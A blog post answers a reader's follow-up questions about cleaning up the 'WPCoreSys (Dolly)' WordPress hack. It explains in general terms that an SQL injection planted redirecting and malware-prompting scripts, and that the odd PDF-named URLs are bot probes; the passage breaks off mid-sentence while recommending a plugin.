This is revisit to one of my most popular post, WPCoreSys (Dolly) Hack. I reader asked some follow-up questions which I think can be useful to other people who are going through the same WordPress hack.
I can’t thank you enough for your post on the WPCoreSys (Dolly) Hack. I’ve been chasing this problem for a few weeks on my WP site, but unable to get to the actual root cause. I’m far from a WP expert (which I’m sure has slowed me down), but I was able to delete the WPCoreSys directory from within the Plugins folder, and also delete the four entries from the wp_dolly_plugin_table (using phpmyadmin), but unable to figure out how to delete the table itself. I’ve also changed admin, cpanel and FTP passwords, and installed some security and audit plugins. Hopefully, all that’s enough to keep the hackers away from doing anything else.
Although your post was incredibly helpful, I do have two questions for you:
First, were ever able to figure out what the hackers were doing? I saw that they created entries into my WP_Posts table, and based on the content it looked like it was somehow related with downloading of pirated files. But, not exactly sure how my little WP site figured into it all.
Secondly, and more importantly, the code changes in your post were way above my technical skill. So, I was wondering if you were aware of any sort of plug in, or other utility that could do the necessary clean-up work for this hack?
I do have one question you may be help to with, that live-traffic shows people going to URLs like:
- http://www.mywebsiteexample.com/?La-saga-McJames–Tome-2—-Dans-le-lit-d-un-guerrier.pdf
- http://www.mywebsiteexample.com/?Revue-technique-automobile—n-253—mai-1967—Simca-1500-1501—Renault-8-Gordini.pdf
- http://www.mywebsiteexample.com/?Photoshop-Elements-11-pour-les-photographes.pdf
…and other very curious/odd names. Those PDFs don’t exist on my site, so WP just takes the user to the home page. Do you have any thoughts about those names, and what might be generating that traffic? I’m wondering if it’s attempt to hack, and a result of the hacking.
Once again, I’m grateful that I found your post.
My response:
You did almost everything needed, if you follow my blog post instructions you should be fine. Since the cleanup, that site hasn’t been hit with another malware attack.
The attack is a typical SQL Injection attack that injects XSS scripts into the website. The XSS script’s payload is do the following:
- Put Javacript code into the pages of your website that would trigger a redirect upon arrival to the website of their choice.
- Put content and website links of their choice into your website.
- Put Javascript code that would trigger q popup box, download dialog boxes to download malware, or place tracking cookies onto the computer of your visitors.
As for the random URL strings you’re seeing is bots querying for hidden pages. They are a nuisance and causes extra processing for your server. I recommend a plugin called